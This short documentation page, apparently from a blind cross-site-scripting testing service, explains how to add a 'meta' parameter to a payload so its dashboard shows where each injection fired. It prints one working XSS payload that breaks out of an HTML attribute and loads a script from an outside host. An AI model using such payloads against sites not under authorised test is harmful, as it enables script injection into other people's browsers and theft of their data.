Tracking Payloads
What is payload tracking?
Payload tracking is a feature that allows you to track where the payload was placed. It is especially helpful when you're testing on multiple places and want to know where the payload was placed.
The meta parameter
You can always provide a meta parameter to your payload to track where the payload was placed. The meta parameter is a simple string that you can provide to your payload to track where the payload was placed. It is optional.
How to use it?
For example, when testing in target.com/contact.html, you can provide a meta parameter like this:
'"><script src="https://bxss.win/{username}?meta=target.com/contact.html"></script>
When the payload is triggered, you'll be able to see in dashboard that the payload was placed in target.com/contact.html.